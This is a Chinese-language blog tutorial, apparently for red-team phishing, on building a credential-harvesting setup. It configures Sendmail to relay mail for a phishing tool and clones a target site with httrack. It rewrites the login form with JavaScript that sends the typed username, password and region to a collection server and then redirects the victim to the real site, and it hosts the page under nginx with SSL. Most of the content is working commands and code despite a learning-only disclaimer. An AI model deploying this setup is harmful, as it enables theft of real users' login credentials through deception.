郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

前言

首先需要编写一个钓鱼一键化平台,然后进入我们的正题

image-20210821112914140

搭建邮件服务器

首先卸载Postfix

如果没有Postfix就跳过

sudo systemctl stop postfix
sudo apt remove postfix && apt purge postfix

安装Sendmail

sudo apt install sendmail

配置Sendmail服务器

sudo sendmailconfig

接收输入电子邮件

编辑/etc/mail/sendmail.mc

DAEMON_OPTIONS(`Family=inet,  Name=MTA-v4, Port=smtp, Addr=127.0.0.1')dnl
DAEMON_OPTIONS(`Family=inet, Name=MSP-v4, Port=submission, M=Ea, Addr=127.0.0.1')dnl

#找到上面这两行修改为
DAEMON_OPTIONS(`Family=inet, Name=MTA-v4, Port=smtp, Addr=0.0.0.0')dnl
dnl DAEMON_OPTIONS(`Family=inet, Name=MSP-v4, Port=submission, M=Ea, Addr=127.0.0.1')dnl

然后将域名添加到/etc/mail/local-host-names文件中

ascotbe.com
mail.ascotbe.com
localhost
localhost.localdomain

现在使用 m4宏处理器来编译Sendmail配置文件。m4是基于流的。

sudo m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf

重新启动Sendmail服务

sudo systemctl restart sendmail

日志文件

里面有一些报错,比方说为什么发送失败等等

/var/log/mail.log

多服务方案

最好是sendmail和medusa搭建在同一台服务器上

而不是使用多服务方案

如果你的Medusa在一个服务器,而邮件服务器又在一个地方,需要修改邮件服务中的配置,打开/etc/mail/access文件

#添加全局配置
202.222 RELAY
#或者添加单IP发送配置,这个IP为你Medusa的服务器IP
192.111.111.111 RELAY

配置完需要重启服务器

配置域名解析

image-20210818111703403

编写钓鱼页面

一般把目标网站copy到本地,然后把页面中的/test/login.html进行补全http://127.0.0.1/test/login.html,具体看网页去,然后修改action标签

<form action="javascript:login()">

一般是这样的,我们只需要把函数进行修改或者自定义,替换成下面函数

不同的网页不同的改法,我这边只是做个样例

var login2 = function () {
var username = $("#username").val()
var password = $("#password").val()
var region = $("#region").val()
if (username.length == 0 || password.length == 0 || region.length == 0) {
//alert('你东西没填是吧')
console.log('空')
return false
}
console.log(username.length == 0)
$.get('http://127.0.0.1:9999/b/sasdasdasd/?', {
username: username,
password: password,
region: region
}, function (data) {
window.location.href = 'http://ascotbe.com'
console.log(data);
});}

整站拉取

可以使用kali或者Ubuntu进行下载,然后进行网站克隆,一般不太会用到,做个记录

sudo apt install httrack

钓鱼网站搭建

安装nginx

apt-get install nginx

查看安装版本

nginx -v

启动nginx

service nginx start

然后输入服务器IP就能看到下面效果

image-20210817160653634

配置钓鱼页面

进入nginx默认的网页目录

cd /var/www/html

你会看到index.html、index.htm、index.nginx-debian.html三个文件中的任意一个(建议全部删了)然后把你改好的钓鱼页面放到上面

image-20210817161251555修改nginx的配置文件

sudo vim /etc/nginx/sites-enabled/default

image-20210817160440321

接着重启服务

sudo systemctl restart nginx

可以看到已经成功的页面

image-20210821113122300

配置SSL证书,还是对/etc/nginx/sites-enabled/default文件进行修改

server {
# 服务器端口使用443,开启ssl, 这里ssl就是上面安装的ssl模块
listen 443 ssl;
#填写绑定证书的域名
server_name ascotbe.com;

# ssl证书地址
ssl_certificate /etc/nginx/cert/ssl.crt; #证书文件名称
ssl_certificate_key /etc/nginx/cert/ssl.key; # 私钥文件名称

# ssl验证相关配置
ssl_session_timeout 5m; #缓存有效期
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4; #加密算法
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; #安全链接可选的加密协议
ssl_prefer_server_ciphers on; #使用服务器端的首选算法

location / {
#网站主页路径。此路径仅供参考,具体请您按照实际目录操作
root /var/www/html;
index logon.html;
}
}
server {
listen 80;
server_name ascotbe.com;
return 301 https://$server_name$request_uri;
}

最好重启Nginx即可看到结果

image-20210817184011177